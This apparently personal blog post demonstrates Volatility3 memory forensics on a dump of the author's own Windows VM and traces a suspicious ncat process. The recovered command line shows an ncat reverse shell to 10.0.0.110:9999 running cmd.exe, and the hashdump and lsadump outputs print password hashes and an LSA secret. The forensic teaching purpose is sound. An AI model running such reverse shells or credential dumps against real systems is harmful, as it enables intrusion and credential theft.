In this post, I'm taking a quick look at Volatility3, to understand its capabilities.
First up, obtaining Volatility3 via GitHub.
┌──(securitynik㉿securitynik)-[~] └─$ git clone https://github.com/volatilityfoundation/volatility3.git
Next up, get an image. For this, I will take a memory dump of my own virtual machine, using Comae's Toolkit DumpIt.exe
C:\TMP λ y:\Comae-Toolkit-Light-3.0.20180307.1\x64\DumpIt.exe DumpIt 3.0.20180307.1 Copyright (C) 2007 - 2017, Matthieu Suiche <http://www.msuiche.net> Copyright (C) 2012 - 2014, MoonSols Limited <http://www.moonsols.com> Copyright (C) 2015 - 2017, Comae Technologies FZE <http://www.comae.io> Destination path: \??\C:\TMP\SECURITYNIK-WIN-20220225-182235.dmp Computer name: SECURITYNIK-WIN --> Proceed with the acquisition ? [y/n] y [+] Information: Dump Type: Microsoft Crash Dump [+] Machine Information: Windows version: 10.0.19044 MachineId: 88688394-D237-438C-92E3-06D84FF93CE9 TimeStamp: 132902869567075443 Cr3: 0x1aa000 KdCopyDataBlock: 0xfffff8054df0e2e8 KdDebuggerData: 0xfffff8054e603b20 KdpDataBlockEncoded: 0xfffff8054e653b28 Current date/time: [2022-02-25 (YYYY-MM-DD) 18:22:36 (UTC)] + Processing... Done. Acquisition finished at: [2022-02-25 (YYYY-MM-DD) 18:22:50 (UTC)] Time elapsed: 0:14 minutes:seconds (14 secs) Created file size: 2147020800 bytes (2047 Mb) Total physical memory size: 2047 Mb NtStatus (troubleshooting): 0x00000000 Total of written pages: 524173 Total of inacessible pages: 0 Total of accessible pages: 524173 SHA-256: A943219879526515F889BA2707699391132EC648E9C3B1B34C45A50DAB0BA6A3 JSON path: C:\TMP\SECURITYNIK-WIN-20220225-182235.json
Now that I have the memory image, first step is to get some help on how to usethe tool.
Setup a symbolic link for volatility3
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ sudo ln --symbolic ~/volatility3/vol.py /usr/bin/vol3
Getting some help!
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --help | more Volatility 3 Framework 2.0.2 usage: volatility [-h] [-c CONFIG] [--parallelism [{processes,threads,off}]] [-e EXTEND] [-p PLUGIN_DIRS] [-s SYMBOL_DIRS] [-v] [-l LOG] [-o OUTPUT_DIR] [-q] [-r RENDERER] [-f FILE] [--write-config] [--clear-cache] [--cache-path CACHE_PATH] [--offline] [--single-location SINGLE_LOCATION] [--stackers [STACKERS ...]] [--single-swap-locations [SINGLE_SWAP_LOCATIONS ...]] plugin ... An open-source memory forensics framework ....
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.info.Info Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished Variable Value Kernel Base 0xf8054da03000 DTB 0x1aa000 Symbols file:///home/securitynik/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/3177D31000BA7590DED335936C93E374-1.json.xz Is64Bit True IsPAE False layer_name 0 WindowsIntel32e memory_layer 1 WindowsCrashDump64Layer base_layer 2 FileLayer KdVersionBlock 0xf8054e612378 Major/Minor 15.19041 MachineType 34404 KeNumberProcessors 1 SystemTime 2022-02-25 18:22:36 NtSystemRoot C:\Windows NtProductType NtProductWinNt NtMajorVersion 10 NtMinorVersion 0 PE MajorOperatingSystemVersion 10 PE MinorOperatingSystemVersion 0 PE Machine 34404 PE TimeDateStamp Mon Jan 22 06:20:17 2103
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output 4 0 System 0xd187b9684040 111 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled 72 4 Registry 0xd187b9754040 4 - N/A False 2022-02-25 18:20:35.000000 N/A Disabled 352 4 smss.exe 0xd187bcf02080 3 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled 444 432 csrss.exe 0xd187c01ea140 11 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled 512 432 wininit.exe 0xd187be054080 5 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled 520 504 csrss.exe 0xd187be053140 11 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled 580 504 winlogon.exe 0xd187be090080 6 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled 604 512 services.exe 0xd187be097080 10 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled 612 512 lsass.exe 0xd187be09d080 8 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled ... 4492 4756 ncat.exe 0xd187c11a5080 5 - 1 False 2022-02-25 18:22:18.000000 N/A Disabled 4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled 4500 4260 cmd.exe 0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled 4584 3960 DumpIt.exe 0xd187c1f81080 6 - 1 False 2022-02-25 18:22:35.000000 N/A Disabled 4636 748 WmiPrvSE.exe 0xd187c1e430c0 11 - 0 False 2022-02-25 18:22:36.000000 N/A Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.psscan.PsScan Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output 4 0 System 0xd187b9684040 111 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled 72 4 Registry 0xd187b9754040 4 - N/A False 2022-02-25 18:20:35.000000 N/A Disabled 352 4 smss.exe 0xd187bcf02080 3 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled 520 504 csrss.exe 0xd187be053140 11 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled 512 432 wininit.exe 0xd187be054080 5 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled 580 504 winlogon.exe 0xd187be090080 6 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled 604 512 services.exe 0xd187be097080 10 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled 612 512 lsass.exe 0xd187be09d080 8 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled ... 4492 4756 ncat.exe 0xd187c11a5080 5 - 1 False 2022-02-25 18:22:18.000000 N/A Disabled ... 3960 3304 cmd.exe 0xd187c1aed080 3 - 1 False 2022-02-25 18:21:10.000000 N/A Disabled 4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled ... 4500 4260 cmd.exe 0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled 4756 4696 cmd.exe 0xd187c1cef080 4 - 1 False 2022-02-25 18:21:55.000000 N/A Disabled ... 4584 3960 DumpIt.exe 0xd187c1f81080 6 - 1 False 2022-02-25 18:22:35.000000 N/A Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.netstat.NetStat Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created 0xd187bff9e730 TCPv4 10.0.0.102 49671 10.0.0.110 9999 ESTABLISHED 4260 ncat.exe 2022-02-25 18:22:18.000000 ....
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.netscan.NetScan Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created 0xd187b9697b50 TCPv4 0.0.0.0 5357 0.0.0.0 0 LISTENING 4 System 2022-02-25 18:20:41.000000 0xd187b9697b50 TCPv6 :: 5357 :: 0 LISTENING 4 System 2022-02-25 18:20:41.000000 0xd187b9697cb0 TCPv4 0.0.0.0 49668 0.0.0.0 0 LISTENING 1832 spoolsv.exe 2022-02-25 18:20:43.000000 0xd187bc7a0050 TCPv4 10.0.0.102 139 0.0.0.0 0 LISTENING 4 System 2022-02-25 18:20:40.000000 0xd187bc7a01b0 TCPv4 0.0.0.0 49668 0.0.0.0 0 LISTENING 1832 spoolsv.exe 2022-02-25 18:20:43.000000 0xd187bc7a01b0 TCPv6 :: 49668 :: 0 LISTENING 1832 spoolsv.exe 2022-02-25 18:20:43.000000 ... 0xd187c1e3c4b0 UDPv4 127.0.0.1 1900 * 0 1560 svchost.exe 2022-02-25 18:22:35.000000 0xd187c1e3d2c0 UDPv6 ::1 1900 * 0 1560 svchost.exe 2022-02-25 18:22:35.000000
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output 4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList | grep 4260 4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled 4500 4260 cmd.exe 0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Args 4260 ncat.exe "C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe" --verbose 10.0.0.110 9999 --exec cmd.exe
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine --pid 4500 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Args 4500 cmd.exe cmd.exe
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dlllist.DllList --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Base Size Name Path LoadTime File output 4260 ncat.exe 0x730000 0x1a1000 ncat.exe C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe 2022-02-25 18:22:18.000000 Disabled 4260 ncat.exe 0x7ffe2ab70000 0x1f5000 ntdll.dll C:\Windows\SYSTEM32\ntdll.dll 2022-02-25 18:22:18.000000 Disabled 4260 ncat.exe 0x7ffe2a810000 0x59000 wow64.dll C:\Windows\System32\wow64.dll 2022-02-25 18:22:18.000000 Disabled 4260 ncat.exe 0x7ffe29950000 0x83000 wow64win.dll C:\Windows\System32\wow64win.dll 2022-02-25 18:22:18.000000 Disabled 4260 ncat.exe 0x771d0000 0xa000 wow64cpu.dll C:\Windows\System32\wow64cpu.dll 2022-02-25 18:22:18.000000 Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dlllist.DllList --pid 4500 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Base Size Name Path LoadTime File output 4500 cmd.exe 0x1000000 0x5a000 cmd.exe C:\Windows\SysWOW64\cmd.exe 2022-02-25 18:22:18.000000 Disabled 4500 cmd.exe 0x7ffe2ab70000 0x1f5000 ntdll.dll C:\Windows\SYSTEM32\ntdll.dll 2022-02-25 18:22:18.000000 Disabled 4500 cmd.exe 0x7ffe2a810000 0x59000 wow64.dll C:\Windows\System32\wow64.dll 2022-02-25 18:22:18.000000 Disabled 4500 cmd.exe 0x7ffe29950000 0x83000 wow64win.dll C:\Windows\System32\wow64win.dll 2022-02-25 18:22:18.000000 Disabled 4500 cmd.exe 0x771d0000 0xa000 wow64cpu.dll C:\Windows\System32\wow64cpu.dll 2022-02-25 18:22:18.000000 Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.ldrmodules.LdrModules --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished Pid Process Base InLoad InInit InMem MappedPath 4260 ncat.exe 0x75c20000 False False False \Windows\SysWOW64\KernelBase.dll 4260 ncat.exe 0x730000 True False True \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe 4260 ncat.exe 0x1400000 False False False \Windows\SysWOW64\winnlsres.dll 4260 ncat.exe 0x1410000 False False False \Windows\System32\en-US\winnlsres.dll.mui 4260 ncat.exe 0x73a70000 False False False \Windows\SysWOW64\apphelp.dll 4260 ncat.exe 0x10000000 False False False \Windows\SysWOW64\pcapwsp.dll 4260 ncat.exe 0x75180000 False False False \Windows\SysWOW64\kernel32.dll 4260 ncat.exe 0x745e0000 False False False \Windows\SysWOW64\cryptsp.dll 4260 ncat.exe 0x74500000 False False False \Windows\SysWOW64\mswsock.dll 4260 ncat.exe 0x73b20000 False False False \Windows\SysWOW64\cryptbase.dll 4260 ncat.exe 0x74560000 False False False \Windows\SysWOW64\rsaenh.dll 4260 ncat.exe 0x750a0000 False False False \Windows\SysWOW64\gdi32full.dll 4260 ncat.exe 0x747b0000 False False False \Windows\SysWOW64\version.dll 4260 ncat.exe 0x759d0000 False False False \Windows\SysWOW64\gdi32.dll 4260 ncat.exe 0x75830000 False False False \Windows\SysWOW64\user32.dll 4260 ncat.exe 0x75b60000 False False False \Windows\SysWOW64\msvcrt.dll 4260 ncat.exe 0x771e0000 False False False \Windows\SysWOW64\ntdll.dll 4260 ncat.exe 0x763e0000 False False False \Windows\SysWOW64\advapi32.dll 4260 ncat.exe 0x75ee0000 False False False \Windows\SysWOW64\msvcp_win.dll 4260 ncat.exe 0x75e60000 False False False \Windows\SysWOW64\sechost.dll 4260 ncat.exe 0x75e40000 False False False \Windows\SysWOW64\bcrypt.dll 4260 ncat.exe 0x762a0000 False False False \Windows\SysWOW64\imm32.dll 4260 ncat.exe 0x762d0000 False False False \Windows\SysWOW64\bcryptprimitives.dll 4260 ncat.exe 0x766e0000 False False False \Windows\SysWOW64\rpcrt4.dll 4260 ncat.exe 0x766c0000 False False False \Windows\SysWOW64\win32u.dll 4260 ncat.exe 0x76460000 False False False \Windows\SysWOW64\ucrtbase.dll 4260 ncat.exe 0x76cf0000 False False False \Windows\SysWOW64\ws2_32.dll 4260 ncat.exe 0x771d0000 True True True \Windows\System32\wow64cpu.dll 4260 ncat.exe 0x7e110000 False False False \Tools\Cmder\vendor\conemu-maximus5\ConEmu\ConEmuHk.dll 4260 ncat.exe 0x7ffe2a810000 True True True \Windows\System32\wow64.dll 4260 ncat.exe 0x7ffe29950000 True True True \Windows\System32\wow64win.dll 4260 ncat.exe 0x7ffe2ab70000 True True True \Windows\System32\ntdll.dll
Nothing seems out of the way above. Dumping the files associated with ncat.exe
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dumpfiles.DumpFiles --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result ImageSectionObject 0xd187bfc10bb0 KernelBase.dll file.0xd187bfc10bb0.0xd187bcf3a770.ImageSectionObject.KernelBase.dll.img DataSectionObject 0xd187c14add70 ncat.exe Error dumping file ImageSectionObject 0xd187c14add70 ncat.exe file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img ...
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ ls | grep ncat file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat ...
Using the file command to identify two files above
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ file file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img \ > file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img: PE32 executable (console) Intel 80386, for MS Windows file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat: PE32 executable (console) Intel 80386, for MS Windows
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.filescan.FileScan | grep -i ncat 0xd187c14add70.0\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe 216 0xd187c1e11be0 \ProgramData\chocolatey\bin\ncat.exe 216 0xd187c1e279e0 \Windows\Prefetch\NCAT.EXE-4B4B887F.pf 216 0xd187c1e2a280 \ProgramData\chocolatey\bin\ncat.exe 216 0xd187c1e32750 \Windows\Prefetch\NCAT.EXE-1B3976EF.pf 216 0xd187c1e34820 \ncat-0 216 0xd187c1e349b0 \ncat-0 216
We see at least there is information on the path of the file as well as their is a prefetch entry.
Looking at the MFTScan plugin.
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.mftscan.MFTScan | grep -i ncat * 0xbb0681ad38b00 FILE 104014an2ing finFiled Archive FILE_NAME 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 ncat.exe.log * 0xbb0681ad3928 FILE 104014 2 File Archive FILE_NAME 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 NCATEX~1.LOG ... * 0xbb0688e7c920 FILE 105970 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCAT.EXE-1B3976EF.pf * 0xbb0688e7d8b0 FILE 105974 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCATEX~2.PF * 0xbb0688e7d920 FILE 105974 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCAT.EXE-4B4B887F.pf
Looking at the environment variables for the ncat.exe process with PID 4260
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.envars.Envars --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Block Variable Value ... 4260 ncat.exe 0x14a4810 LOCALAPPDATA C:\Users\SecurityNik\AppData\Local ... 4260 ncat.exe 0x14a4810 OS Windows_NT ... 4260 ncat.exe 0x14a4810 USERDOMAIN SECURITYNIK-WIN 4260 ncat.exe 0x14a4810 USERDOMAIN_ROAMINGPROFILE SECURITYNIK-WIN 4260 ncat.exe 0x14a4810 USERNAME SecurityNik 4260 ncat.exe 0x14a4810 USERPROFILE C:\Users\SecurityNik 4260 ncat.exe 0x14a4810 user_aliases C:\Tools\Cmder\config\user_aliases.cmd 4260 ncat.exe 0x14a4810 USER_BUILD windows.1 4260 ncat.exe 0x14a4810 USER_MAJOR 2 4260 ncat.exe 0x14a4810 USER_MINOR 34 4260 ncat.exe 0x14a4810 USER_PATCH 1 4260 ncat.exe 0x14a4810 VENDORED_BUILD windows.1 4260 ncat.exe 0x14a4810 VENDORED_MAJOR 2 4260 ncat.exe 0x14a4810 VENDORED_MINOR 29 4260 ncat.exe 0x14a4810 VENDORED_PATCH 1 4260 ncat.exe 0x14a4810 verbose_output 0 ...
Getting information on the user and the permission the ncat.exe process is running with.
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.getsids.GetSIDs --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process SID Name 4260 ncat.exe S-1-5-21-3036856633-148622980-1367235899-1001 SecurityNik 4260 ncat.exe S-1-5-21-3036856633-148622980-1367235899-513 Domain Users 4260 ncat.exe S-1-1-0 Everyone 4260 ncat.exe S-1-5-114 Local Account (Member of Administrators) 4260 ncat.exe S-1-5-32-544 Administrators 4260 ncat.exe S-1-5-32-545 Users 4260 ncat.exe S-1-5-4 Interactive 4260 ncat.exe S-1-2-1 Console Logon (Users who are logged onto the physical console) 4260 ncat.exe S-1-5-11 Authenticated Users 4260 ncat.exe S-1-5-15 This Organization 4260 ncat.exe S-1-5-113 Local Account 4260 ncat.exe S-1-5-5-0-184823 Logon Session 4260 ncat.exe S-1-2-0 Local (Users with the ability to log in locally) 4260 ncat.exe S-1-5-64-10 NTLM Authentication 4260 ncat.exe S-1-16-12288 High Mandatory Level
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.privileges.Privs --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Value Privilege Attributes Description 4260 ncat.exe 2 SeCreateTokenPrivilege Create a token object 4260 ncat.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token 4260 ncat.exe 4 SeLockMemoryPrivilege Lock pages in memory 4260 ncat.exe 5 SeIncreaseQuotaPrivilege Present Increase quotas 4260 ncat.exe 6 SeMachineAccountPrivilege Add workstations to the domain 4260 ncat.exe 7 SeTcbPrivilege Act as part of the operating system 4260 ncat.exe 8 SeSecurityPrivilege Present Manage auditing and security log 4260 ncat.exe 9 SeTakeOwnershipPrivilege Present Take ownership of files/objects 4260 ncat.exe 10 SeLoadDriverPrivilege Present Load and unload device drivers 4260 ncat.exe 11 SeSystemProfilePrivilege Present Profile system performance 4260 ncat.exe 12 SeSystemtimePrivilege Present Change the system time 4260 ncat.exe 13 SeProfileSingleProcessPrivilege Present Profile a single process 4260 ncat.exe 14 SeIncreaseBasePriorityPrivilege Present Increase scheduling priority 4260 ncat.exe 15 SeCreatePagefilePrivilege Present Create a pagefile 4260 ncat.exe 16 SeCreatePermanentPrivilege Create permanent shared objects 4260 ncat.exe 17 SeBackupPrivilege Present Backup files and directories 4260 ncat.exe 18 SeRestorePrivilege Present Restore files and directories 4260 ncat.exe 19 SeShutdownPrivilege Present Shut down the system 4260 ncat.exe 20 SeDebugPrivilege Present Debug programs 4260 ncat.exe 21 SeAuditPrivilege Generate security audits 4260 ncat.exe 22 SeSystemEnvironmentPrivilege Present Edit firmware environment values 4260 ncat.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories 4260 ncat.exe 24 SeRemoteShutdownPrivilege Present Force shutdown from a remote system 4260 ncat.exe 25 SeUndockPrivilege Present Remove computer from docking station 4260 ncat.exe 26 SeSyncAgentPrivilege Synch directory service data 4260 ncat.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation 4260 ncat.exe 28 SeManageVolumePrivilege Present Manage the files on a volume 4260 ncat.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication 4260 ncat.exe 30 SeCreateGlobalPrivilege Present,Enabled,Default Create global objects 4260 ncat.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller 4260 ncat.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object 4260 ncat.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications 4260 ncat.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock 4260 ncat.exe 35 SeCreateSymbolicLinkPrivilege Present Required to create a symbolic link 4260 ncat.exe 36 SeDelegateSessionUserImpersonatePrivilege Present Obtain an impersonation token for another user in the same session.
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.handles.Handles --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Offset HandleValue Type GrantedAccess Name ... 4260 ncat.exe 0xd187c1e33d30 0x94 File 0x100020 \Device\HarddiskVolume2\Users\SecurityNik ... 4260 ncat.exe 0xd187c13b76e0 0x1f8 Event 0x1f0003 4260 ncat.exe 0xd187c1e34690 0x1fc File 0x120089 \Device\NamedPipe\ 4260 ncat.exe 0xd187c1e34500 0x204 File 0x120196 \Device\NamedPipe 4260 ncat.exe 0xd187c1e34820 0x208 File 0x120089 \Device\NamedPipe\ncat-0 4260 ncat.exe 0xd187c10dd400 0x210 Mutant 0x1f0001 4260 ncat.exe 0xd187c1bc6080 0x214 Process 0x1fffff ncat.exe Pid 4500 ... USER\S-1-5-21-3036856633-148622980-1367235899-1001\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION 4260 ncat.exe 0xd187c1f5ef60 0x228 Event 0x1f0003 4260 ncat.exe 0xd187c13b8de0 0x22c Event 0x1f0003
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.hashdump.Hashdump Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished User rid lmhash nthash Administrator 500 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0 Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0 DefaultAccount 503 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0 WDAGUtilityAccount 504 aad3b435b51404eeaad3b435b51404ee c2622233208f902795d9ad5bde22b628 SecurityNik 1001 aad3b435b51404eeaad3b435b51404ee 23e1d10001876b0078a9a779017fc026
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.lsadump.Lsadump Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished Key Secret Hex DefaultPassword Testing1%òvÌBhúmÃfTî 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 25 f2 1f 76 83 cc a0 08 42 68 fa 6d c3 66 54 ee DPAPI_SYSTEM ,ÀC³▒N#0t"íãܺÈÕÿs/É▒I[ÌÕؤqôUMn 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 c0 43 b3 1a 05 9e 4e 23 30 74 22 9b e6 ed e3 dc ba c8 1d d5 ff 73 9c 2f c9 1a 49 0f 5b cc d5 d8 7f a4 94 71 f4 55 4d 6e 00 00 00 00 L$_RasConnectionCredentials#0 88[`Þ6Ù5N½Â§^)nTesting1 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 05 00 5b 60 de 36 d9 98 35 4e bd c2 a7 15 5e 81 29 6e 12 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 NL$KM @×çs¶o(ôÛQÙSGÔÀÙ²7e¿Â¡Û#jåh®X8'c`:Aݤ¨u¹▒7=ÁéqÆÿÿC}ºR5uù 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e7 ad 73 b6 6f 28 f4 db 51 12 d9 53 47 86 d4 0f c0 d9 b2 37 65 bf 53 97 08 c2 a1 db 23 9f 6a e5 9d 68 ae 9c 9a 58 0e 38 27 63 60 05 06 3a 85 88 41 dd 1b 21 16 1b 75 8a a4 a8 75 b9 18 37 3d 16 c1 e9 10 71 c6 ff ff 43 7d ba 06 52 35 75 f9
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.verinfo.VerInfo | more Volatility 3 Framework 2.0.2 PDB scanning finished PID Process Base Name Major Minor Product Build ... 4260 ncat.exe 0x730000 ncat.exe - - - - 4260 ncat.exe 0x7ffe2ab70000 ntdll.dll - - - - 4260 ncat.exe 0x7ffe2a810000 wow64.dll - - - - 4260 ncat.exe 0x7ffe29950000 wow64win.dll - - - - 4260 ncat.exe 0x771d0000 wow64cpu.dll - - - - ...
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.vadinfo.VadInfo --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Offset Start VPN End VPN Tag Protection CommitCharge PrivateMemory Parent File File output 4260 ncat.exe 0xd187bfeeaad0 0x75c20000 0x75e33fff Vad PAGE_EXECUTE_WRITECOPY 28 0 0x0 \Windows\SysWOW64\KernelBase.dll Disabled 4260 ncat.exe 0xd187c1c83e40 0x14a0000 0x14affff VadS PAGE_READWRITE 11 1 0xffffd187bfeeaad0 N/A Disabled ... 4260 ncat.exe 0xd187c1fac350 0x730000 0x8d0fff Vad PAGE_EXECUTE_WRITECOPY 18 0 0xffffd187bfeeac10 \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe Disabled ... 0xffffd187c01f7a60 \Windows\SysWOW64\pcapwsp.dll Disabled 4260 ncat.exe 0xd187c01f8050 0x3d40000 0x3e3ffff VadS PAGE_READWRITE 4 1 0xffffd187bceac5a0 N/A Disabled ... 4260 ncat.exe 0xd187c1c7cc30 0x7ffe7000 0x7ffe7fff VadS PAGE_READONLY 1 1 0xffffd187c1fb03b0 N/A Disabled 4260 ncat.exe 0xd187c1c82e00 0x7f290000 0x7f291fff VadS PAGE_READWRITE 1 1 0xffffd187c1c7cc30 N/A Disabled 4260 ncat.exe 0xd187bfeedc30 0x7f150000 0x7f24ffff Vad PAGE_READONLY 0 0 